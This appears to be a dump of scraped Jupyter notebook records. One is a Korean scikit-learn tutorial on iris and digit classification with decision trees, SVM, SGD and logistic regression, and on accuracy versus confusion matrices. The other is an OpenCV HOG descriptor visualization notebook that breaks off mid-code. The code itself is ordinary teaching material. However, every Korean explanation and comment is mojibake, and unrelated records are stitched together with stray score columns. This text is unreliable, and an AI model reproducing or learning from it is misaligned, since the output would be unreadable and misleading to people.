์ ๋ต๊ณผ ์ค๋ต์ ๊ตฌ๋ถํ์ฌ ํํํ๋ ๋ฐฉ๋ฒ์ ์ค์ฐจํ๋ ฌ(confusion matrix)์ด๋ผ๊ณ ํฉ๋๋ค.
```
from sklearn.metrics import confusion_matrix
confusion_matrix(y_test, y_pred)
confusion_matrix(y_test, fake_pred)
from sklearn.metrics import classification_report
print(classification_report(y_test, y_pred))
print(classification_report(y_test, fake_pred))
accuracy_score(y_test, y_pred), accuracy_score(y_test, fake_pred)
```
์์ ๊ณผ์ ์๋ณด๋ฉด fake_pred ์์ 3์ ํ๋๋ ๋ง์ถ์ง ์์์ง๋ง ์ ํ๋๋ฅผ ๋น๊ตํด๋ณด์์๋
y_pred์ ํฌ๊ฒ ์ฐจ์ด๋์ง ์๋๋ค
๋ชจ๋ธ์ ์ฑ๋ฅ์ ์ ํ๋ ๋ง์ผ๋ก ํ๊ฐํ๋ฉด ์๋๋ค
ํนํ๋ label์ด ๋ถ๊ท ํํ๊ฒ ๋ถํฌ๋์ด ์๋ ๋ฐ์ดํฐ๋ฅผ ๋ค๋ฃฐ ๋์๋ ๋ ์กฐ์ฌํด์ผ ํ๋ค.
```
```
|
github_jupyter
|
#๋ฐ์ดํฐ๋ฅผ ๋ถ๋ฌ์จ๋ค
from sklearn.datasets import load_iris
iris = load_iris()
print(type(dir(iris)))
#dir()๋ ๊ฐ์ฒด๊ฐ ์ด๋ค ๋ณ์์ ๋ฉ์๋๋ฅผ ๊ฐ์ง๊ณ ์๋์ง ๋์ดํจ
#iris ์ ์ด๋ค ์ ๋ณด๋ค์ด ๋ด๊ฒผ๋์ง keys() ๋ผ๋ ๋ฉ์๋๋ก ํ์ธ
iris.keys()
#๊ฐ์ฅ ์ค์ํ ๋ฐ์ดํฐ๋ iris_data ๋ณ์์ ์ ์ฅํ ํฌ๊ธฐ๋ฅผ ํ์ธ
iris_data = iris.data
print(iris_data.shape)
iris_data[0]
#์์๋๋ก sepal length, speal width, petal length, petal width
#์ฐ๋ฆฌ๋ ๊ฝ์๊ณผ ๊ฝ๋ฐ์นจ์ ๊ธธ์ด๊ฐ ์ฃผ์ด์ง๋ ๊ฒฝ์ฐ ๊ทธ ์ธ๊ฐ์ง ํ์ข
์ค ์ด๋ค๊ฒ์ธ์ง ๋ฅผ ๋ง์ถ๊ณ ์ถ๋ค
#๋จธ์ ๋ฌ๋๋ชจ๋ธ ์๊ฒ ๊ฝ์, ๊ฝ๋ฐ์นจ์ ๊ธธ์ด์ ํญ, ๋ถ๊ฝ์ ํ์ข์ ์ถ๋ ฅํ๋๋ก ํ์ต์์ผ์ผํจ
#์ฌ๊ธฐ์ ๋ชจ๋ธ์ด ์ถ๋ ฅํด์ผ ํ๋ ์ ๋ต์ ๋ผ๋ฒจ(label), ๋๋ ํ๊ฒ(target) ์ด๋ผ๊ณ ํ๋ค.
iris_label = iris.target
print(iris_label.shape)
iris_label
#์ด ๋ผ๋ฒจ์ ๋ฃ์ ํ๊ฒ์ ์ซ์๋ ๋ฌด์์ ๋ํ๋ด๋ ๊ฑธ๊น์?
#๋ผ๋ฒจ์ ์ด๋ฆ์ target_names ์์ ํ์ธ๊ฐ๋ฅ
iris.target_names
#์์๋๋ก 0 1 2
print(iris.DESCR)
iris.feature_names
#4๊ฐ์ ๊ฐ feature์ ๋ํ ์ค๋ช
์ด ๋ด๊ฒจ์์.
iris.filename #๋ฐ์ดํฐ์
ํ์ผ์ด ์ ์ฅ๋ ๊ฒฝ๋ก
#ํ๋ค์ค๋ ํ์ด์ฌ์์ ํ ํํ๋ก ์ด๋ฃจ์ด์ง 2์ฐจ์ ๋ฐฐ์ด ๋ฐ์ดํฐ๋ฅผ ๋ค๋ฃจ๋๋ฐ ๋ง์ด ์ฐ์
#iris ๋ฐ์ดํฐ ๋ํ ํ๊ณผ ์ด์ด ์๋ 2์ฐจ์ ๋ฐ์ดํฐ์ด๋ฏ๋ก pandas๋ฅผ ํ์ฉํด๋ณด์
import pandas as pd
print(pd.__version__)
#๋ถ๊ฝ ๋ฐ์ดํฐ์
์ pandas ๊ฐ ์ ๊ณตํ๋ DataFrame์ด๋ผ๋ ์๋ฃํ์ผ๋ก ๋ณํํด๋ณด์
iris_df = pd.DataFrame(data=iris_data, columns=iris.feature_names)
#์ดํด๋ฅผ ์ํด iris_data์ iris.feature_names ๋ฅผ ์ถ๋ ฅํด๋ณด์
print(iris_data)
print(iris.feature_names)
#์ด ๋๊ฐ๋ฅผ ๋ถ๋ฌ์ ๋ง๋ DataFrame์ ์ดํด๋ณด์.
iris_df.head()
#์ ๋ต ๋ฐ์ดํฐ๋ ํจ๊ป ์๋ค๋ฉด ๋ฐ์ดํฐ๋ฅผ ๋ค๋ฃจ๊ธฐ ๋ ํธ๋ฆฌํ๋, label ์ด๋ผ๋ ์ปฌ๋ผ์ ์ถ๊ฐ
iris.target
iris_df["label"] = iris.target
iris_df.head()
#์ฌ๊ธฐ์ 4๊ฐ์ง์ feature ๋ฐ์ดํฐ๋ค์ ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์ด ํ์ด์ผ ํ๋ ๋ฌธ์ ์ง์ ๊ฐ์.
#[5.1, 3.5, 1.4, 0.2] ๋ผ๋ ๋ฌธ์ ๊ฐ ์ฃผ์ด์ง๋ค๋ฉด ๋ชจ๋ธ์ 0 ์ฆ setosa
#๋ฐ๋ผ์ 0,1,2 ์ ๊ฐ์ด ํํ๋ label๋ฐ์ดํฐ๋ ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์๊ฒ ์ ๋ต์ง์ด๋ค.
#๋ฌธ์ ์ง: ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์๊ฒ ์
๋ ฅ๋๋ ๋ฐ์ดํฐ. feature ๋ผ๊ณ ๋ถ๋ฅด๊ธฐ๋ํ๋ค. ๋ณ์๋ก๋ x๋ฅผ ๋ง์ด ์ฌ์ฉ
#์ ๋ต์ง: ๋ชจ๋ธ์ด ๋ง์ถ์ด์ผ ํ๋ ๋ฐ์ดํฐ. label ๋๋ target์ด๋ผ๊ณ ๋ถ๋ฅด๊ธฐ๋ํจ.๋ณ์ ์ด๋ฆ์ผ๋ก y๋ฅผ ๋ง์ด์ฌ์ฉ
#๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์ ํ์ต์ํค๋ ค๋ฉด
#ํ์ต์ ์ฌ์ฉํ๋ training dataset
#๋ชจ๋ธ์ ์ฑ๋ฅ์ ํ๊ฐํ๋ ๋ฐ ์ฌ์ฉํ๋ test dataset์ผ๋ก ๋๋๋ ์์
์ด ํ์
#๋ฐ์ดํฐ์
์ ๋ถ๋ฆฌํ๋๊ฒ์ scikit-learn์ด ์ ๊ณตํ๋ train_test_split ์ด๋ผ๋ ํจ์๋ก ๊ฐ๋จํ ๊ฐ๋ฅ.
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(iris_data,
iris_label,
test_size=0.2,
random_state=7)
print('X_train ๊ฐ์: ', len(X_train), 'X_test ๊ฐ์: ', len(X_test))
#์ฒซ๋ฒ์งธ ํ๋ผ๋ฏธํฐ์ธ iris_data๋ ๋ฌธ์ ์ง, ์ฆ feature
#๋๋ฒ์งธ ํ๋ผ๋ฏธํฐ์ธ iris_label์ ์ ๋ต๊ฐ, ์ฆ label
#์ด๋ ๊ฒ ํด์ 4๊ฐ์ feature ๋ฐ์ดํฐ๋ง ์๋ x
#์ ๋ต ๋ฐ์ดํฐ๋ง ์๋ y๋ฅผ ์ป์
#์ธ๋ฒ์งธ ์ธ์์ธ test_size ๋ก๋ test dataset์ ํฌ๊ธฐ๋ฅผ ์กฐ์ ๊ฐ๋ฅ 0.2๋ ์ ์ฒด์ 20%
#๋ง์ง๋ง์ผ๋ก ์ด random_state ๋ train ๋ฐ์ดํฐ์ test ๋ฐ์ดํฐ๋ฅผ ๋ถ๋ฆฌํ๋๋ฐ ์ ์ฉ๋๋ ๋๋ค์ ๊ฒฐ์
#๋ง์ฝ ์ด ๋ฐ์ดํฐ ๊ทธ๋๋ ํ์ต์ฉ๊ณผ ํ
์คํธ์ฉ ๋ฐ์ดํฐ๋ฅผ ๋๋๋ค๋ฉด ๋ค์ชฝ์ 20%๊ฐ ํ
์คํธ์ฉ ๋ฐ์ดํฐ์
์ผ๋ก ๋ง๋ค์ด์ง๊ธฐ ๋๋ฌธ์
#ํ
์คํธ์ฉ ๋ฐ์ดํฐ์
์ ๋ผ๋ฒจ์ด 2์ธ ๋ฐ์ดํฐ๋ก๋ง ๊ตฌ์ฑ๋จ
#๊ทธ๋์ ๋ฐ์ดํฐ ๋ถ๋ฆฌ์ ๋๋ค์ผ๋ก ์๋ ๊ณผ์ ์ด ํ์ํ๊ณ random_state๊ฐ ์ด ์ญํ ์ ํ๊ฒ๋จ
#์ปดํจํฐ์์ ๋๋ค์ ํน์ ๋ก์ง์ ๋ฐ๋ผ ๊ฒฐ์ ๋๋ ์๋ฒฝํ ๋๋ค์ ์๋
#๊ทธ๋์ ๋๋ค์ ์กฐ์ ํ ์ ์๋ ๊ฐ์ธ random_state, random_seed ๋ฅผ ์ฌ์ฉ
# ์ด ๊ฐ์ด ๊ฐ๋ค๋ฉด ์ฝ๋๋ ํญ์ ๊ฐ์ ๋๋ค ๊ฒฐ๊ณผ๋ฅผ ๋ํ๋
#๋ฐ์ดํฐ์
์ ํ์ธ
print(X_train.shape, y_train.shape)
print(X_test.shape, y_test.shape)
print(y_train)
print()
print( y_test)
#์์์ ํ์ธํ label ๊ณผ๋ ๋ค๋ฅด๊ฒ 0,1,2๊ฐ ๋ฌด์์๋ก ์์ฌ์๋ค.
#๋จธ์ ๋ฌ๋์ ์ง๋ํ์ต(Supervised Learning), ๋น์ง๋ ํ์ต(Unsupervised Learning)
# ์ง๋ํ์ต์ ์ ๋ต์ด ์๋ ๋ฌธ์ ์ ํ์ต, ๋น์ง๋ ํ์ต์ ์ ๋ต์ด ์๋ ๋ฌธ์ ๋ฅผ ํ์ต
#์ง๋ํ์ต์ ๋๊ฐ์ง๋ก ๋๋์ด์ง
#๋ถ๋ฅ(Classification)์ ํ๊ท(Regression)
#๋ถ๋ฅ๋ ์
๋ ฅ๋ฐ์ ๋ฐ์ดํฐ๋ฅผ ํน์ ์นดํ
๊ณ ์ค ํ๋๋ก ๋ถ๋ฅ
#ํ๊ท๋ ์
๋ ฅ๋ฐ์ ๋ฐ์ดํฐ์ ๋ฐ๋ผ ํน์ ํ๋์ ์์น๋ฅผ ๋ง์ถ๋ ๋ฌธ์ .
#๋ถ๊ฝ ํ์ข
์ ๋ถ๋ฅ๋ฌธ์
#ํ๊ท ๋ฌธ์ ์ ์๋ก ์ง์๋ํ ์ ๋ณด(ํ์,์์น,์ธต์ ๋ฑ)๋ฅผ ์
๋ ฅ๋ฐ์ ๊ทธ ์ง์ ๊ฐ๊ฒฉ์ ๋ง์ถ๋ ๋ฌธ์
#๋ถ๊ฝ ๋ฌธ์ ๋ ์ง๋ํ์ต์ด๋ฉฐ ๋ถ๋ฅ ๋ฌธ์
#๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์ ๋ญ ์ฌ์ฉํ ์ง ๋ช
ํํด์ง
#๋ถ๋ฅ๋ชจ๋ธ์ ์์ฃผ ๋ค์ ํ์ง๋ง ๊ทธ์ค Decision Tree ๋ชจ๋ธ์ ์ฌ์ฉ
#์์ฌ๊ฒฐ์ ๋๋ฌด๋ ๊ฒฐ์ ๊ฒฝ๊ณ๊ฐ ๋ฐ์ดํฐ ์ถ์ ์์ง์ด์ด์ ํน์ ๋ฐ์ดํฐ๋ง ์ ์๋ํ ์ ์๋ค๋ ๋ฌธ์ ๊ฐ ์์
#์ด๋ฅผ ๊ทน๋ณตํ๊ธฐ์ํด ์ ์๋ ๋ชจ๋ธ์ด Random Forest, ์ฌ๋ฌ๊ฐ์ Decision Tree๋ฅผ ํฉ์ณ์ ๋ง๋ค์ด ๋์ ๊ฐ๋
#๊ฐ๋จํ Decision Tree๋ ์์ฌ ๊ฒฐ์ ์ ํ , ์ฆ ๋ฐ์ดํฐ๋ฅผ ๋ถ๋ฆฌํ ์ด๋ ๊ฒฝ๊ณ๋ฅผ ์ฐพ์๋ด
#๋ฐ์ดํฐ๋ฅผ ์ฒด์ ๊ฑฐ๋ฅด๋ฏ ํ๋จ๊ณ์ฉ ๋ถ๋ฅํด ๋๊ฐ๋ ๋ชจ๋ธ
#์ด ๊ณผ์ ์ ์ํธ๋กํผ, ์ ๋ณด๋, ์ง๋๋ถ์๋ ๋ฑ์ ๊ฐ๋
์ด ํฌํจ. ๋จธ์ ๋ฌ๋ ์๊ณ ๋ฆฌ์ฆ ์ดํด๋ฅผ ์ํด ํ์
#sklearn.tree ํจํค์ง ์์ DecisionTreeClassifier ๋ผ๋ ์ด๋ฆ์ผ๋ก ๋ด์ฅ๋์์
from sklearn.tree import DecisionTreeClassifier
decision_tree = DecisionTreeClassifier(random_state=32)
print(decision_tree._estimator_type)
#๋ชจ๋ธํ์ต
decision_tree.fit(X_train, y_train)
#training dataset ์ผ๋ก ๋ชจ๋ธ์ ํ์ต์ํจ๋ค๋ ๊ฒ์
#training dataset์ ๋ง๊ฒ ๋ชจ๋ธ์ fitting, ๋ง์ถ๋ ๊ฒ
#training dataset์ ์๋ ๋ฐ์ดํฐ๋ค์ ํตํด ์ด๋ ํ ํจํด์ ํ์
ํ๊ณ ,
#๊ทธ ํจํด์ ๋ง๊ฒ ์์ธก์ ํ ์ ์๋๋ก ํ์ต๋๊ธฐ ๋๋ฌธ์
๋๋ค.
#๋ค๋ฅธ ๋ง๋ก ํ๋ฉด ๋ชจ๋ธ์ training dataset์ ์กด์ฌํ์ง ์๋ ๋ฐ์ดํฐ์ ๋ํด์๋
#์ ํํ ์ ๋ต ์นดํ
๊ณ ๋ฆฌ๊ฐ ๋ฌด์์ธ์ง ์์ง ๋ชปํจ.
#๋ค๋ง training dataset์ ํตํด ํ์ตํ ํจํด์ผ๋ก
#์๋ก์ด ๋ฐ์ดํฐ๊ฐ ์ด๋ค ์นดํ
๊ณ ๋ฆฌ์ ์ํ ์ง ์์ธกํ ๋ฟ.
#์๋ก์ด ๋ฐ์ดํฐ์ ๋ํด์๋ ์ ๋ง์ถ ์ ์๊ธฐ ์ํด์
#training dataset์ด ์ด๋ป๊ฒ ๊ตฌ์ฑ๋์ด ์๋์ง๊ฐ ๋งค์ฐ ์ค์
#๋ ๋ค์ํ, ๋ ์ผ๋ฐํ ๋ ๋ฐ์ดํฐ๋ก ํ์ต์ด ๋ ์๋ก ์๋ก์ด ๋ฐ์ดํฐ์ ๋ํด์๋ ์ ๋ง์ถ ์ ์์
y_pred = decision_tree.predict(X_test)
y_pred
#X_test๋ฐ์ดํฐ๋ feature (๋ฌธ์ ) ๋ง ์กด์ฌ
#๋ฐ๋ผ์ ํ์ต์ด ์๋ฃ๋ decision_tree ๋ชจ๋ธ์ X_test ๋ฐ์ดํฐ๋ก predict๋ฅผ ์คํํ๋ฉด
#๋ชจ๋ธ์ด ์์ธกํ y_pred๋ฅผ ์ป๊ฒ๋จ
#์ค์ ์ ๋ต์ธ y_test์ ๋น๊ตํด๋ณด์
y_test
#์ฑ๋ฅํ๊ฐ์ ๋ํ ํจ์๋ค์ด ๋ชจ์ฌ์๋ sklearn.metrics ํจํค์ง๋ฅผ ์ด์ฉ
#์ ํ๋Accuracy ๋ฅผ ๊ฐ๋จํ ํ์ธ
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(y_test, y_pred)
accuracy
#์ ์ฒด ๊ฐ์์ค ๋ง์๊ฒ์ ๊ฐ์์ ์์น๋ฅผ ๋ํ๋. 90ํผ์ผํธ์ ์ ํ๋
#์ ํ๋ = ์์ธก๊ฒฐ๊ณผ๊ฐ์ ๋ต์ธ๋ฐ์ดํฐ์๊ฐ์ / ์์ธกํ์ ์ฒด๋ฐ์ดํฐ์๊ฐ์
#๋ค๋ฅธ ๋ชจ๋ธ์ ๋ค๋ฃจ๊ธฐ ์ ์ Decision Tree ๋ชจ๋ธ์ ํ์ต์ํค๊ณ ์์ธกํ๋ ๊ณผ์ ์ ๋ณต์ต
# 1.ํ์ํ ๋ชจ๋ import
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report
# 2.๋ฐ์ดํฐ ์ค๋น.
iris = load_iris()
iris_data = iris.data
iris_label = iris.target
# 3.train, test ๋ฐ์ดํฐ๋ถ๋ฆฌ
X_train, X_test, y_train, y_test = train_test_split(iris_data,
iris_label,
test_size=0.2,
random_state=7)
# 4.๋ชจ๋ธ ํ์ต ๋ฐ ์์ธก
decision_tree = DecisionTreeClassifier(random_state=32)
decision_tree.fit(X_train, y_train)
y_pred = decision_tree.predict(X_test)
print(classification_report(y_test, y_pred))
#SVM ๋ชจ๋ธ์ ๋ค์๊ณผ ๊ฐ์ด ์ฌ์ฉํฉ๋๋ค.
from sklearn import svm
svm_model = svm.SVC()
print(svm_model._estimator_type)
svm_model.fit(X_train, y_train)
y_pred = svm_model.predict(X_test)
print(classification_report(y_test, y_pred))
from sklearn.linear_model import SGDClassifier
sgd_model = SGDClassifier()
print(sgd_model._estimator_type)
sgd_model.fit(X_train, y_train)
y_pred = sgd_model.predict(X_test)
print(classification_report(y_test, y_pred))
# Logistic Regression
from sklearn.linear_model import LogisticRegression
logistic_model = LogisticRegression()
print(logistic_model._estimator_type)
logistic_model.fit(X_train, y_train)
y_pred = logistic_model.predict(X_test)
print(classification_report(y_test, y_pred))
from sklearn.datasets import load_digits
digits = load_digits()
digits.keys()
digits_data = digits.data
digits_data.shape
digits_data[0]
#์ด๋ฏธ์ง๋ฅผ ๋ณด๊ธฐ์ํด ๋งทํ๋๋ฆฝ ์ํฌํธ
import matplotlib.pyplot as plt
%matplotlib inline
plt.imshow(digits.data[0].reshape(8,8), cmap='gray')
plt.axis('off')
plt.show()
#์ฌ๋ฌ ๊ฐ์ ์ด๋ฏธ์ง๋ฅผ ํ๋ฒ์ ํ์ธํ๊ธฐ
for i in range(10):
plt.subplot(2, 5, i+1)
plt.imshow(digits.data[i].reshape(8,8), cmap='gray')
plt.axis('off')
plt.show()
#target ๋ฐ์ดํฐ๋ ์ด๋จ๊น
digits_label = digits.target
print(digits_label.shape)
digits_label[:20]
#์ ํ๋์ ํจ์ ์ ํ์ธํ๊ธฐ ์ํด, ํด๋น ์ด๋ฏธ์ง์ ๋ฐ์ดํฐ๊ฐ 3์ธ์ง ์๋์ง๋ฅผ ๋ง์ถ๋ ๋ฌธ์ ๋ก ๋ณํ
#์
๋ ฅ๋ ๋ฐ์ดํฐ๊ฐ 3์ด๋ผ๋ฉด 3์, 3์ด ์๋ ๋ค๋ฅธ ์ซ์๋ผ๋ฉด 0์ ์ถ๋ ฅ
new_label = [3 if i == 3 else 0 for i in digits_label]
new_label[:20]
#์ด ๋ฌธ์ ๋ฅผ ํ๊ธฐ ์ํด ๋ค์ Decision Tree๋ฅผ ํ์ต
X_train, X_test, y_train, y_test = train_test_split(digits_data,
new_label,
test_size=0.2,
random_state=15)
decision_tree = DecisionTreeClassifier(random_state=15)
decision_tree.fit(X_train, y_train)
y_pred = decision_tree.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
accuracy
fake_pred = [0] * len(y_pred)
accuracy = accuracy_score(y_test, fake_pred)
accuracy
from sklearn.metrics import confusion_matrix
confusion_matrix(y_test, y_pred)
confusion_matrix(y_test, fake_pred)
from sklearn.metrics import classification_report
print(classification_report(y_test, y_pred))
print(classification_report(y_test, fake_pred))
accuracy_score(y_test, y_pred), accuracy_score(y_test, fake_pred)
| 0.281307 | 0.961389 |
# Examples
Below you will find various examples for you to experiment with HOG. For each image, you can modify the `cell_size`, `num_cells_per_block`, and `num_bins` (the number of angular bins in your histograms), to see how those parameters affect the resulting HOG descriptor. These examples, will help you get some intuition for what each parameter does and how they can be *tuned* to pick out the amount of detail required. Below is a list of the available images that you can load:
* cat.jpeg
* jeep1.jpeg
* jeep2.jpeg
* jeep3.jpeg
* man.jpeg
* pedestrian_bike.jpeg
* roundabout.jpeg
* scrabble.jpeg
* shuttle.jpeg
* triangle_tile.jpeg
* watch.jpeg
* woman.jpeg
**NOTE**: If you are running this notebook in the Udacity workspace, there is around a 2 second lag in the interactive plot. This means that if you click in the image to zoom in, it will take about 2 seconds for the plot to refresh.
```
%matplotlib notebook
import cv2
import copy
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
# Set the default figure size
plt.rcParams['figure.figsize'] = [9.8, 9]
# -------------------------- Select the Image and Specify the parameters for our HOG descriptor --------------------------
# Load the image
image = cv2.imread('./images/jeep2.jpeg')
# Cell Size in pixels (width, height). Must be smaller than the size of the detection window
# and must be chosen so that the resulting Block Size is smaller than the detection window.
cell_size = (8, 8)
# Number of cells per block in each direction (x, y). Must be chosen so that the resulting
# Block Size is smaller than the detection window
num_cells_per_block = (2, 2)
# Number of gradient orientation bins
num_bins = 9
# -------------------------------------------------------------------------------------------------------------------------
# Convert the original image to RGB
original_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Convert the original image to gray scale
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Block Size in pixels (width, height). Must be an integer multiple of Cell Size.
# The Block Size must be smaller than the detection window
block_size = (num_cells_per_block[0] * cell_size[0],
num_cells_per_block[1] * cell_size[1])
# Calculate the number of cells that fit in our image in the x and y directions
x_cells = gray_image.shape[1] // cell_size[0]
y_cells = gray_image.shape[0] // cell_size[1]
# Horizontal distance between blocks in units of Cell Size. Must be an integer and it must
# be set such that (x_cells - num_cells_per_block[0]) / h_stride = integer.
h_stride = 1
# Vertical distance between blocks in units of Cell Size. Must be an integer and it must
# be set such that (y_cells - num_cells_per_block[1]) / v_stride = integer.
v_stride = 1
# Block Stride in pixels (horizantal, vertical). Must be an integer multiple of Cell Size
block_stride = (cell_size[0] * h_stride, cell_size[1] * v_stride)
# Specify the size of the detection window (Region of Interest) in pixels (width, height).
# It must be an integer multiple of Cell Size and it must cover the entire image. Because
# the detection window must be an integer multiple of cell size, depending on the size of
# your cells, the resulting detection window might be slightly smaller than the image.
# This is perfectly ok.
win_size = (x_cells * cell_size[0] , y_cells * cell_size[1])
# Print the shape of the gray scale image for reference
print('\nThe gray scale image has shape: ', gray_image.shape)
print()
# Print the parameters of our HOG descriptor
print('HOG Descriptor Parameters:\n')
print('Window Size:', win_size)
print('Cell Size:', cell_size)
print('Block Size:', block_size)
print('Block Stride:', block_stride)
print('Number of Bins:', num_bins)
print()
# Set the parameters of the HOG descriptor using the variables defined above
hog = cv2.HOGDescriptor(win_size, block_size, block_stride, cell_size, num_bins)
# Compute the HOG Descriptor for the gray scale image
hog_descriptor = hog.compute(gray_image)
# Calculate the total number of blocks along the width of the detection window
tot_bx = np.uint32(((x_cells - num_cells_per_block[0]) / h_stride) + 1)
# Calculate the total number of blocks along the height of the detection window
tot_by = np.uint32(((y_cells - num_cells_per_block[1]) / v_stride) + 1)
# Calculate the total number of elements in the feature vector
tot_els = (tot_bx) * (tot_by) * num_cells_per_block[0] * num_cells_per_block[1] * num_bins
# Reshape the feature vector to [blocks_y, blocks_x, num_cells_per_block_x, num_cells_per_block_y, num_bins].
# The blocks_x and blocks_y will be transposed so that the first index (blocks_y) referes to the row number
# and the second index to the column number. This will be useful later when we plot the feature vector, so
# that the feature vector indexing matches the image indexing.
hog_descriptor_reshaped = hog_descriptor.reshape(tot_bx,
tot_by,
num_cells_per_block[0],
num_cells_per_block[1],
num_bins).transpose((1, 0, 2, 3, 4))
# Create an array that will hold the average gradients for each cell
ave_grad = np.zeros((y_cells, x_cells, num_bins))
# Create an array that will count the number of histograms per cell
hist_counter = np.zeros((y_cells, x_cells, 1))
# Add up all the histograms for each cell and count the number of histograms per cell
for i in range (num_cells_per_block[0]):
for j in range(num_cells_per_block[1]):
ave_grad[i:tot_by + i,
j:tot_bx + j] += hog_descriptor_reshaped[:, :, i, j, :]
hist_counter[i:tot_by + i,
j:tot_bx + j] += 1
# Calculate the average gradient for each cell
ave_grad /= hist_counter
# Calculate the total number of vectors we have in all the cells.
len_vecs = ave_grad.shape[0] * ave_grad.shape[1] * ave_grad.shape[2]
# Create an array that has num_bins equally spaced between 0 and 180 degress in radians.
deg = np.linspace(0, np.pi, num_bins, endpoint = False)
# Each cell will have a histogram with num_bins. For each cell, plot each bin as a vector (with its magnitude
# equal to the height of the bin in the histogram, and its angle corresponding to the bin in the histogram).
# To do this, create rank 1 arrays that will hold the (x,y)-coordinate of all the vectors in all the cells in the
# image. Also, create the rank 1 arrays that will hold all the (U,V)-components of all the vectors in all the
# cells in the image. Create the arrays that will hold all the vector positons and components.
U = np.zeros((len_vecs))
V = np.zeros((len_vecs))
X = np.zeros((len_vecs))
Y = np.zeros((len_vecs))
# Set the counter to zero
counter = 0
# Use the cosine and sine functions to calculate the vector components (U,V) from their maginitudes. Remember the
# cosine and sine functions take angles in radians. Calculate the vector positions and magnitudes from the
# average gradient array
for i in range(ave_grad.shape[0]):
for j in range(ave_grad.shape[1]):
for k in range(ave_grad.shape[2]):
U[counter] = ave_grad[i,j,k] * np.cos(deg[k])
V[counter] = ave_grad[i,j,k] * np.sin(deg[k])
X[counter] = (cell_size[0] / 2) + (cell_size[0] * i)
Y[counter] = (cell_size[1] / 2) + (cell_size[1] * j)
counter = counter + 1
# Create the bins in degress to plot our histogram.
angle_axis = np.linspace(0, 180, num_bins, endpoint = False)
angle_axis += ((angle_axis[1] - angle_axis[0]) / 2)
# Create a figure with 4 subplots arranged in 2 x 2
fig, ((a,b),(c,d)) = plt.subplots(2,2)
# Set the title of each subplot
a.set(title = 'Gray Scale Image\n(Click to Zoom)')
b.set(title = 'HOG Descriptor\n(Click to Zoom)')
c.set(title = 'Zoom Window', xlim = (0, 18), ylim = (0, 18), autoscale_on = False)
d.set(title = 'Histogram of Gradients')
# Plot the gray scale image
a.imshow(gray_image, cmap = 'gray')
a.set_aspect(aspect = 1)
# Plot the feature vector (HOG Descriptor)
b.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 5)
b.invert_yaxis()
b.set_aspect(aspect = 1)
b.set_facecolor('black')
# Define function for interactive zoom
def onpress(event):
#Unless the left mouse button is pressed do nothing
if event.button != 1:
return
# Only accept clicks for subplots a and b
if event.inaxes in [a, b]:
# Get mouse click coordinates
x, y = event.xdata, event.ydata
# Select the cell closest to the mouse click coordinates
cell_num_x = np.uint32(x / cell_size[0])
cell_num_y = np.uint32(y / cell_size[1])
# Set the edge coordinates of the rectangle patch
edgex = x - (x % cell_size[0])
edgey = y - (y % cell_size[1])
# Create a rectangle patch that matches the the cell selected above
rect = patches.Rectangle((edgex, edgey),
cell_size[0], cell_size[1],
linewidth = 1,
edgecolor = 'magenta',
facecolor='none')
# A single patch can only be used in a single plot. Create copies
# of the patch to use in the other subplots
rect2 = copy.copy(rect)
rect3 = copy.copy(rect)
# Update all subplots
a.clear()
a.set(title = 'Gray Scale Image\n(Click to Zoom)')
a.imshow(gray_image, cmap = 'gray')
a.set_aspect(aspect = 1)
a.add_patch(rect)
b.clear()
b.set(title = 'HOG Descriptor\n(Click to Zoom)')
b.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 5)
b.invert_yaxis()
b.set_aspect(aspect = 1)
b.set_facecolor('black')
b.add_patch(rect2)
c.clear()
c.set(title = 'Zoom Window')
c.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 1)
c.set_xlim(edgex - cell_size[0], edgex + (2 * cell_size[0]))
c.set_ylim(edgey - cell_size[1], edgey + (2 * cell_size[1]))
c.invert_yaxis()
c.set_aspect(aspect = 1)
c.set_facecolor('black')
c.add_patch(rect3)
d.clear()
d.set(title = 'Histogram of Gradients')
d.grid()
d.set_xlim(0, 180)
d.set_xticks(angle_axis)
d.set_xlabel('Angle')
d.bar(angle_axis,
ave_grad[cell_num_y, cell_num_x, :],
180 // num_bins,
align = 'center',
alpha = 0.5,
linewidth = 1.2,
edgecolor = 'k')
fig.canvas.draw()
# Create a connection between the figure and the mouse click
fig.canvas.mpl_connect('button_press_event', onpress)
plt.show()
```
|
github_jupyter
|
%matplotlib notebook
import cv2
import copy
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
# Set the default figure size
plt.rcParams['figure.figsize'] = [9.8, 9]
# -------------------------- Select the Image and Specify the parameters for our HOG descriptor --------------------------
# Load the image
image = cv2.imread('./images/jeep2.jpeg')
# Cell Size in pixels (width, height). Must be smaller than the size of the detection window
# and must be chosen so that the resulting Block Size is smaller than the detection window.
cell_size = (8, 8)
# Number of cells per block in each direction (x, y). Must be chosen so that the resulting
# Block Size is smaller than the detection window
num_cells_per_block = (2, 2)
# Number of gradient orientation bins
num_bins = 9
# -------------------------------------------------------------------------------------------------------------------------
# Convert the original image to RGB
original_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Convert the original image to gray scale
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Block Size in pixels (width, height). Must be an integer multiple of Cell Size.
# The Block Size must be smaller than the detection window
block_size = (num_cells_per_block[0] * cell_size[0],
num_cells_per_block[1] * cell_size[1])
# Calculate the number of cells that fit in our image in the x and y directions
x_cells = gray_image.shape[1] // cell_size[0]
y_cells = gray_image.shape[0] // cell_size[1]
# Horizontal distance between blocks in units of Cell Size. Must be an integer and it must
# be set such that (x_cells - num_cells_per_block[0]) / h_stride = integer.
h_stride = 1
# Vertical distance between blocks in units of Cell Size. Must be an integer and it must
